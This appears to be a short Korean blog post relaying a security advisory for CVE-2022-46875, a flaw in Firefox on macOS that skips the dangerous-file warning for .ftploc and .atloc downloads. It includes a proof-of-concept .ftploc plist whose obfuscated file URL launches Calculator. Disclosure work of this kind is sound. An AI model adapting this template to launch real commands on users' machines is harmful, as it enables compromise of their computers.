본문 바로가기
카테고리 없음

[0-Day] CVE-2022-46875 - Mozilla Firefox Download Protection Bypass Vulnerability

by l33d0hyun 2023. 1. 15.

Mozilla Firefox

Original Write up : SSD ADVISORY – MACOS MOZILLA FIREFOX DOWNLOAD PROTECTIONS WERE BYPASSED

Summary

  • A vulnerability in Mozilla Firefox has been found to not show an executable file warning when downloading .atloc and .ftploc files, which can run commands on a user’s computer.

Credit

CVE

  • CVE-2022-46875

Vendor Response

Technical Analysis

  • A vulnerability in the way Mozilla Firefox handles certain file extensions allows attackers to bypass the warning given for dangerous files and make them seem harmless.
  • The protection triggers on .interloc but fails to do the same for .ftploc and .atloc, two extensions that on macOS are equivalent to executables.

PoC

  • poc.ftploc
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
    <key>URL</key>
    <string>FiLe:////////////////////////System/Applications/Calculator.app</string>
    </dict>
    </plist>

Demo

댓글